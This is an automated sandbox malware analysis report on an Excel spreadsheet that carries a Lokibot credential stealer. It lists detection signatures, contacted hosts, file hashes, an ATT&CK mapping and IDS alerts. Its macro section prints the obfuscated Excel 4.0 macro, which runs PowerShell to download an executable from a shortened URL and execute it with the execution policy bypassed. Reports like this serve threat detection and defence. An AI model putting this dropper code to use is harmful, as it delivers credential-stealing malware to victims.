Analysis Report 6Cprm97UTl
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
Memory Dumps |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security | ||
JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security | ||
Lokibot | detect Lokibot in memory | JPCERT/CC Incident Response Group |
| |
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
Unpacked PEs |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security | ||
JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security | ||
Loki_1 | Loki Payload | kevoreilly |
| |
Lokibot | detect Lokibot in memory | JPCERT/CC Incident Response Group |
| |
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: Microsoft Office Product Spawning Windows Shell |
Source: | Author: Michael Haag, Florian Roth, Markus Neis: |
Signature Overview |
---|
AV Detection: |
---|
Machine Learning detection for dropped file |
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: |
Source: | Code function: |
Source: | File opened: |
Software Vulnerabilities: |
---|
Document exploit detected (process start blacklist hit) |
Source: | Process created: |
Source: | Code function: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Networking: |
---|
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) |
Source: | Snort IDS: |
Source: | HTTP traffic detected: |
Source: | IP Address: |
Source: | ASN Name: | ||
Source: | ASN Name: |
Source: | JA3 fingerprint: |
Source: | HTTP traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: |
Source: | Code function: |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | Network traffic detected: | ||
System Summary: |
---|
Malicious sample detected (through community Yara rule) |
Source: | Matched rule: | ||
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) |
Source: | Screenshot OCR: | ||
Found Excel 4.0 Macro with suspicious formulas |
Source: | Initial sample: |
Found abnormal large hidden Excel 4.0 Macro sheet |
Source: | Initial sample: |
Found obfuscated Excel 4.0 Macro |
Source: | Initial sample: |
Powershell drops PE file |
Source: | File created: |
Source: | Memory allocated: | ||
Source: | Code function: |
Source: | OLE indicator, VBA macros: |
Source: | Dropped File: |
Source: | Code function: | ||
Source: | Registry key queried: |
Source: | Process created: |
Source: | Matched rule: | ||
Source: | Cryptographic APIs: | ||
Source: | Binary or memory string: |
Source: | Classification label: |
Source: | Code function: |
Source: | File created: |
Source: | Mutant created: | ||
Source: | File created: |
Source: | OLE indicator, Workbook stream: |
Source: | Console Write: |
Source: | Section loaded: | ||
Source: | File read: |
Source: | Key opened: |
Source: | File read: |
Source: | Process created: | ||
Source: | Key value queried: |
Source: | Window detected: |
Source: | File opened: |
Source: | Key opened: |
Source: | File opened: |
Source: | Binary string: | ||
Data Obfuscation: |
---|
Obfuscated command line found |
Source: | Process created: | ||
Yara detected aPLib compressed binary |
Source: | File source: | ||
Source: | Code function: | ||
Persistence and Installation Behavior: |
---|
Drops PE files to the document folder of the user |
Source: | File created: |
Boot Survival: |
---|
Drops PE files to the user root directory |
Source: | File created: |
Source: | Registry value created or modified: |
Hooking and other Techniques for Hiding and Protection: |
---|
Hides that the sample has been downloaded from the Internet (zone.identifier) |
Source: | File opened: | ||
Source: | Registry key monitored for changes: |
Source: | Process information set: | ||
Source: | Thread delayed: | ||
Source: | Thread sleep time: | ||
Source: | Thread sleep count: | ||
Source: | Last function: |
Source: | Code function: |
Source: | File opened: | ||
Source: | Binary or memory string: |
Source: | Process information queried: |
Source: | Code function: |
Source: | Code function: |
Source: | Process token adjusted: | ||
Source: | Memory allocated: |
HIPS / PFW / Operating System Protection Evasion: |
---|
Allocates memory in foreign processes |
Source: | Memory allocated: |
Bypasses PowerShell execution policy |
Source: | Process created: |
Injects a PE file into a foreign processes |
Source: | Memory written: |
Writes to foreign memory regions |
Source: | Memory written: |
Source: | Process created: |
Source: | Queries volume information: |
Source: | Code function: |
Source: | Key value queried: |
Stealing of Sensitive Information: |
---|
Yara detected Lokibot |
Source: | File source: |
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) |
Source: | Key opened: |
Tries to harvest and steal browser information (history, passwords, etc) |
Source: | File opened: |
Tries to harvest and steal ftp login credentials |
Source: | File opened: |
Tries to steal Mail credentials (via file access) |
Source: | Key opened: |
Tries to steal Mail credentials (via file registry) |
Source: | Code function: |
Source: | File source: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts1 | Scripting31 | Valid Accounts1 | Valid Accounts1 | Disable or Modify Tools11 | OS Credential Dumping2 | Account Discovery1 | Remote Services | Archive Collected Data11 | Exfiltration Over Other Network Medium | Ingress Tool Transfer2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution13 | Registry Run Keys / Startup Folder1 | Access Token Manipulation11 | Deobfuscate/Decode Files or Information111 | Credentials in Registry2 | File and Directory Discovery3 | Remote Desktop Protocol | Man in the Browser1 | Exfiltration Over Bluetooth | Encrypted Channel12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | Command and Scripting Interpreter11 | Logon Script (Windows) | Process Injection311 | Scripting31 | Security Account Manager | System Information Discovery13 | SMB/Windows Admin Shares | Data from Local System2 | Automated Exfiltration | Non-Application Layer Protocol3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | PowerShell2 | Logon Script (Mac) | Registry Run Keys / Startup Folder1 | Obfuscated Files or Information3 | NTDS | Query Registry1 | Distributed Component Object Model | Email Collection1 | Scheduled Transfer | Application Layer Protocol14 | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Masquerading111 | LSA Secrets | Security Software Discovery11 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Valid Accounts1 | Cached Domain Credentials | Virtualization/Sandbox Evasion2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
External Remote Services | Scheduled Task | Startup Items | Startup Items | Modify Registry1 | DCSync | Process Discovery1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Virtualization/Sandbox Evasion2 | Proc Filesystem | System Owner/User Discovery1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue | |
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Access Token Manipulation11 | /etc/passwd and /etc/shadow | Remote System Discovery1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction | |
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Process Injection311 | Network Sniffing | Process Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact | ||
Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Hidden Files and Directories1 | Input Capture | Permission Groups Discovery | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | Service Stop |
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
No Antivirus matches |
---|
Dropped Files |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
| 100% | Joe Sandbox ML | | |
| 100% | Joe Sandbox ML | | |
| 0% | Metadefender | | |
| 0% | ReversingLabs | | |
Unpacked PE Files |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
| 100% | Avira | TR/Crypt.XPACK.Gen | |
| 100% | Avira | TR/Crypt.XPACK.Gen | |
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
| 0% | URL Reputation | safe | |
| 0% | Avira URL Cloud | safe | |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
cutt.ly | 104.22.0.232 | true | true | unknown | |
bighoreca.nl | 83.172.144.37 | true | true | unknown |
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
| true | | unknown |
| true | | unknown |
Contacted IPs |
---|
Public |
---|
IP | Domain | Country | ASN | ASN Name | Malicious |
---|---|---|---|---|---|
83.172.144.37 | unknown | Netherlands | 25459 | NEDZONE-ASNL | true |
104.22.0.232 | unknown | United States | 13335 | CLOUDFLARENETUS | true |
185.206.215.56 | unknown | Ukraine | 204601 | ON-LINE-DATAServerlocation-NetherlandsDrontenNL | true |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Red Diamond |
Analysis ID: | 336301 |
Start date: | 05.01.2021 |
Start time: | 19:04:25 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 10m 12s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | 6Cprm97UTl (renamed file extension from none to xls) |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 21 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.spyw.expl.evad.winXLS@27/18@2/3 |
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
19:04:41 | API Interceptor | |
19:05:09 | API Interceptor | |
19:05:15 | Autostart | |
19:05:22 | API Interceptor | |
19:05:23 | Autostart | |
19:05:29 | API Interceptor |
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
104.22.0.232 | | | malicious | | |
Domains |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
cutt.ly | | | malicious | | |
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
NEDZONE-ASNL | | | malicious | | |
CLOUDFLARENETUS | | | malicious | | |
ON-LINE-DATAServerlocation-NetherlandsDrontenNL | | | malicious | | |
JA3 Fingerprints |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
05af1f5ca1b87cc9cc9b25185115607d | | | malicious | | |
Dropped Files |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
C:\Users\user\AppData\Local\Temp\RegAsm.exe | | | malicious | | |
Created / dropped Files |
---|
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Category: | dropped |
Size (bytes): | 58936 |
Entropy (8bit): | 7.994797855729196 |
Encrypted: | true |
Malicious: | false |
Reputation: | high, very likely benign file |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Category: | dropped |
Size (bytes): | 326 |
Entropy (8bit): | 3.1086014193077407 |
Encrypted: | false |
Malicious: | false |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Category: | dropped |
Size (bytes): | 105034 |
Entropy (8bit): | 7.925151112906241 |
Encrypted: | false |
Malicious: | false |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Category: | dropped |
Size (bytes): | 58936 |
Entropy (8bit): | 7.994797855729196 |
Encrypted: | true |
Malicious: | false |
Process: | C:\Users\user\ntrwe.exe |
Category: | dropped |
Size (bytes): | 64672 |
Entropy (8bit): | 6.033474133573561 |
Encrypted: | false |
Malicious: | true |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Category: | dropped |
Size (bytes): | 152533 |
Entropy (8bit): | 6.31602258454967 |
Encrypted: | false |
Malicious: | false |
Process: | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
Malicious: | false |
Process: | C:\Users\user\AppData\Local\Temp\RegAsm.exe |
Category: | dropped |
Size (bytes): | 35006 |
Entropy (8bit): | 0.6024827961083986 |
Encrypted: | false |
Malicious: | false |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Category: | dropped |
Size (bytes): | 2028 |
Entropy (8bit): | 4.547448419157985 |
Encrypted: | false |
Malicious: | false |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.493703650549725 |
Encrypted: | false |
Malicious: | false |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Category: | dropped |
Size (bytes): | 83 |
Entropy (8bit): | 4.598856563846179 |
Encrypted: | false |
Malicious: | false |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Category: | dropped |
Size (bytes): | 8016 |
Entropy (8bit): | 3.589329078025861 |
Encrypted: | false |
Malicious: | false |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Category: | dropped |
Size (bytes): | 8016 |
Entropy (8bit): | 3.589329078025861 |
Encrypted: | false |
Malicious: | false |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Category: | dropped |
Size (bytes): | 8016 |
Entropy (8bit): | 3.589329078025861 |
Encrypted: | false |
Malicious: | false |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Category: | dropped |
Size (bytes): | 152144 |
Entropy (8bit): | 7.1465330226768335 |
Encrypted: | false |
Malicious: | false |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Category: | modified |
Size (bytes): | 938440 |
Entropy (8bit): | 5.522147302514215 |
Encrypted: | false |
Malicious: | true |
Process: | C:\Users\user\AppData\Local\Temp\12.exe |
Category: | dropped |
Size (bytes): | 938440 |
Entropy (8bit): | 5.522147302514215 |
Encrypted: | false |
Malicious: | true |
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.166667516407053 |
TrID: |
|
File name: | 6Cprm97UTl.xls |
File size: | 127488 |
MD5: | 29c8b5edc30eadf757b72b0a14857903 |
SHA1: | 77d432fb96a0a453bae30107990c2c9ee0314330 |
SHA256: | a174abce368b775138c203d66fa8a3845aead2d53d87f220c58a2fe8ee7d9cf0 |
SHA512: | f3e796ac54c7f64a01aca3ea2ae9c886e11ffdbc103024f34a19fdf4c07a58756375a9b60c4635cfb0790b82339147bf975303cd5f1f1fcbe8e2650d2c85f408 |
SSDEEP: | 3072:U4k3hbdlylKsgqopeJBWhZFGkE+cL2Nd+ioo1gaSNAPZlsWFPO7YiR6PJEcjjaPY:Xk3hbdlylKsgqopeJBWhZFVE+W2Nd+id |
File Icon |
---|
Icon Hash: | e4eea286a4b4bcb4 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OLE | |
Number of OLE Files: | 1 |
OLE File "6Cprm97UTl.xls" |
---|
Indicators | |
---|---|
Has Summary Info: | True |
Application Name: | unknown |
Encrypted Document: | False |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | True |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | True |
Summary | |
---|---|
Code Page: | 1252 |
Last Saved By: | |
Create Time: | 2020-09-20 21:17:44 |
Last Saved Time: | 2021-01-05 14:27:14 |
Security: | 0 |
Document Summary | |
---|---|
Document Code Page: | 1252 |
Thumbnail Scaling Desired: | False |
Contains Dirty Links: | False |
Shared Document: | False |
Changed Hyperlinks: | False |
Application Version: | 983040 |
Streams |
---|
Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5DocumentSummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.232115956307 |
Base64 Encoded: | False |
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5SummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.190042678721 |
Base64 Encoded: | False |
Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 116784 |
---|
General | |
---|---|
Stream Path: | Workbook |
File Type: | Applesoft BASIC program data, first line number 16 |
Stream Size: | 116784 |
Entropy: | 7.53092053212 |
Base64 Encoded: | True |
Macro 4.0 Code |
---|
=ERROR(FALSE)
"=GET.CELL(5,M583)"
"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(D117)&""o^wer^she^l^l -w 1 (nEw-oB`jecT Ne""&CHAR(116)&CHAR(46)&CHAR(87)&CHAR(101)&""bcLIENt).('Do""&CHAR(119)&""n'+'loadFile').In""&CHAR(118)&""oke('""&CHAR(104)&""ttps://cutt.ly/qjdJoz4','12""&CHAR(46)&""exe')"")"
"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(D117)&""o^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item """"12""&CHAR(46)&""exe"""" -Destination """"${enV`:temp}"""""")"
"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(D117)&""o^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12""&CHAR(46)&""exe')"")"
Network Behavior |
---|
Snort IDS Alerts |
---|
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
01/05/21-19:05:22.500040 | TCP | 2021697 | ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious | 49167 | 80 | 192.168.2.22 | 83.172.144.37 |
01/05/21-19:06:07.649980 | TCP | 2024312 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 49168 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:07.649980 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49168 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:07.649980 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49168 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:07.649980 | TCP | 2024317 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 | 49168 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:08.163209 | TCP | 2024312 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 49169 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:08.163209 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49169 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:08.163209 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49169 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:08.163209 | TCP | 2024317 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 | 49169 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:08.473302 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49170 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:08.473302 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49170 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:08.473302 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49170 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:08.473302 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49170 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:08.645122 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49170 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:08.887025 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49171 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:08.887025 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49171 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:08.887025 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49171 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:08.887025 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49171 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:09.065680 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49171 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:09.279376 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49172 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:09.279376 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49172 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:09.279376 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49172 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:09.279376 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49172 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:09.462394 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49172 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:09.669670 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49173 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:09.669670 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49173 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:09.669670 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49173 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:09.669670 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49173 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:09.843837 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49173 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:10.067266 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49174 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:10.067266 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49174 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:10.067266 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49174 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:10.067266 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49174 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:10.236854 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49174 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:10.499611 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49175 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:10.499611 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49175 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:10.499611 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49175 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:10.499611 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49175 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:10.673143 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49175 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:10.888136 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49176 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:10.888136 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49176 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:10.888136 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49176 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:10.888136 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49176 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:11.065621 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49176 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:11.296993 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49177 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:11.296993 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49177 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:11.296993 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49177 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:11.296993 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49177 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:11.461579 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49177 | 185.206.215.56 | 192.168.2.22 |
01/05/21-19:06:11.686950 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49178 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:11.686950 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49178 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:11.686950 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49178 | 80 | 192.168.2.22 | 185.206.215.56 |
01/05/21-19:06:11.686950 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49178 | 80 | 192.168.2.22 | 185.206.215.56 |
